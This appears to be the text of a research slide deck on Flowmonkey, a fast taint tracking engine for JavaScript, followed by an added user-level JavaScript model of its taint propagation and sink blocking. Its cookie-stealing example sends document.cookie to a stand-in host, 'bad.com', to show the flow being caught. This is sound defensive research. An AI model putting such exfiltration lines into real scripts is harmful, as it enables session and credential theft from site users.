Flowmonkey: A Fast Dynamic Taint Tracking Engine for JavaScript Don Jang UC San Diego
Epidemic of Data Stealing JavaScript! • Identity Theft • Cookie Stealing (document.cookie) • Password • Credit card # • Browsing history
How to Detect Data Stealing? • Without Sacrificing Performance?
Outline: Motivation • Dynamic Taint Tracking • Flowmonkey • Future Work & Conclusion
Dynamic Taint Tracking • Tracks where a value goes at runtime
Dynamic Taint Tracking • 1. Tag a value with a taint (at a confidential source) • 2. Propagate the taint along with the value through every operation it flows into • 3. Block tainted values at untrusted sinks
Example: Cookie Stealing
  ck = document.cookie;
  data = tmp + ck;
  send("bad.com", data);
• Inject taints at confidential sources: reading document.cookie tags ck
• Propagate taints at assignments, concatenation, etc.: ck → tmp + ck → data (tmp, here "cr=" + color, carries no taint)
• Block taints at untrusted sinks: send("bad.com", data) is refused because data is tainted
Dynamic Taint Tracking: Policies (✗ marks a forbidden flow) • Cookie Protection: cookie ✗→ send() • Password Protection: password ✗→ send() • General Policy: secret info ✗→ expression
Dynamic Taint Tracking: Prior Work in JS • Cross site scripting prevention with dynamic data tainting and static analysis, NDSS'07 (10~100x slowdown) • Analyzing information flow in JavaScript-based browser extensions, ACSAC'09 • An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10
Flowmonkey
Architecture [diagram: Source code → Interpreter and JIT Engine, with M marking modified components] • Based on JaegerMonkey • Taint tracking logic is augmented into both the interpreter and the JIT engine
Language Extensions (Flowmonkey-specific, not standard JavaScript) • __taint(val, t): returns val tagged with taint t • __taintof(val): returns the taint of val
Language Extensions: Example
  var secret = __taint(34349, 1);
  tmp = secret * 68;
  tmp2 = tmp + "345";
  tmp3 = parseInt(tmp2);
  alert(__taintof(tmp)); // 1 is printed: the taint follows the value through arithmetic, concatenation and parseInt
Implementation: Shadow Stack • Every slot of the real operand stack has a shadow slot holding that value's taint • Evaluating s * 6 with s = 5: push s → real stack [5], shadow stack [s's taint]; push 6 → real stack [5, 6], shadow stack [s's taint, 6's taint]; mul → real stack [30], shadow stack [joined taint of both operands]
Implementation: Shadow Property • a.fld = secret: the real property a.fld stores the value, a parallel shadow property stores fld's taint • Each object carries shadow properties mirroring its real properties, so taints survive being stored in and read back from objects
Hybrid Approach • Two execution modes: a full-fledged taint tracking interpreter and a taint detecting JIT engine • JIT-compiled code runs at full speed as long as it doesn't touch a taint; it only checks whether a tainted value is encountered • Taint detected!! → hand control to the interpreter and do full-fledged taint tracking • Rapid prototyping • Fast with few taints • Slow with many taints
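The following is an added example, not Flowmonkey code: a user-level model in plain JavaScript of what the engine does internally, covering the cookie stealing example, the __taint/__taintof extensions, the shadow stack join and shadow properties, and the hybrid fast/slow path. Because stock JavaScript cannot hook `+`, `*` or property stores, every operation goes through an explicit helper (binop, call, setProp, getProp, sink); those helper names, the bit-set representation of taints, the TaintViolation error and the sample cookie value are all assumptions of this model, not the engine's API.

```javascript
// Added example modelling Flowmonkey's taint tracking in user-land JS.
// Assumption: a taint is a bit set; joining two taints is bitwise OR.
const TAINT_NONE = 0;
const TAINT_COOKIE = 1, TAINT_PASSWORD = 2;

// A tainted value carries its taint beside the real value (one "shadow slot").
class Tainted {
  constructor(value, taint) { this.value = value; this.taint = taint; }
}

// Modelled after the slide's __taint(val, t) and __taintof(val) extensions.
function __taint(val, t) {
  const v = val instanceof Tainted ? val.value : val;
  const old = val instanceof Tainted ? val.taint : TAINT_NONE;
  return new Tainted(v, old | t);
}
function __taintof(val) { return val instanceof Tainted ? val.taint : TAINT_NONE; }
function valueOf(val) { return val instanceof Tainted ? val.value : val; }

// Hybrid approach: operands without taint take the cheap "JIT" path that only
// computes the value; any tainted operand forces the "interpreter" path that
// also joins the taints, as the shadow stack does for mul.
const stats = { fast: 0, slow: 0 };

function binop(op, a, b) {
  const va = valueOf(a), vb = valueOf(b);
  let raw;
  if (op === "+") raw = va + vb;          // number add or string concat, as in JS
  else if (op === "*") raw = va * vb;
  else throw new Error("unsupported op " + op);
  const ta = __taintof(a), tb = __taintof(b);
  if (ta === TAINT_NONE && tb === TAINT_NONE) { stats.fast++; return raw; }
  stats.slow++;
  return new Tainted(raw, ta | tb);       // joined taint of both operands
}

// Built-in calls (e.g. parseInt): result taint = join of all argument taints.
function call(fn, ...args) {
  const t = args.reduce((acc, x) => acc | __taintof(x), TAINT_NONE);
  const raw = fn(...args.map(valueOf));
  return t === TAINT_NONE ? raw : new Tainted(raw, t);
}

// Shadow properties: the real property holds the value, a hidden per-object
// table holds the taint of each property.
const SHADOW = Symbol("shadow");
function setProp(obj, key, val) {
  obj[key] = valueOf(val);
  if (!obj[SHADOW]) obj[SHADOW] = Object.create(null);
  obj[SHADOW][key] = __taintof(val);
}
function getProp(obj, key) {
  const t = obj[SHADOW] ? (obj[SHADOW][key] || TAINT_NONE) : TAINT_NONE;
  return t === TAINT_NONE ? obj[key] : new Tainted(obj[key], t);
}

// Policy: which taint bits each sink must never receive ("cookie ✗→ send()").
const policy = { send: TAINT_COOKIE | TAINT_PASSWORD };
class TaintViolation extends Error {}
function sink(name, ...args) {
  const t = args.reduce((acc, x) => acc | __taintof(x), TAINT_NONE);
  const forbidden = t & (policy[name] ?? TAINT_NONE);
  if (forbidden) throw new TaintViolation(`${name}: blocked taint bits ${forbidden}`);
  return { name, args: args.map(valueOf) };   // untainted data passes through
}

// The cookie stealing example. document.cookie is a constructed stand-in,
// tagged at the source the way the engine would tag the real read.
function cookieStealing() {
  const document = { cookie: __taint("sid=abc123", TAINT_COOKIE) };
  const tmp = binop("+", "cr=", "blue");   // untainted: fast path
  const ck = document.cookie;
  const data = binop("+", tmp, ck);        // tainted: slow path, taint propagates
  try { sink("send", "bad.com", data); return "sent"; }
  catch (e) { if (e instanceof TaintViolation) return "blocked"; throw e; }
}

// The slide's numeric example: the taint survives *, +, parseInt and a
// round trip through an object property.
function numericExample() {
  const secret = __taint(34349, 1);
  const tmp = binop("*", secret, 68);
  const tmp2 = binop("+", tmp, "345");
  const tmp3 = call(parseInt, tmp2, 10);
  const o = {};
  setProp(o, "fld", tmp3);
  return { tmp: __taintof(tmp), tmp3: __taintof(tmp3),
           fld: __taintof(getProp(o, "fld")), value: valueOf(tmp3) };
}
```

The counters in `stats` show the hybrid trade-off in miniature: a run that never touches a taint only ever increments `fast`, while every operation on a tainted operand lands on the slow path, which is why the approach is fast with few taints and slow with many.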
Performance: Baseline vs. Cookie Tracking [bar charts not recoverable from the page] • Benchmark: SunSpider • Workload: the cookie doesn't flow to 3rd party code, so few taints are touched and the JIT fast path stays active
Future Work & Conclusion
Future Work • Missing Flows: implicit flows, timing channels, etc. are not tracked • Empirical Study: to prove the usability of taint tracking
Conclusions • A fast hybrid taint tracking engine • First JIT-enabled taint tracking engine • Still many missing parts • Possible to make it a protection tool? • Can we sacrifice some performance?
Resources http://firebird.ucsd.edu/flowmonkey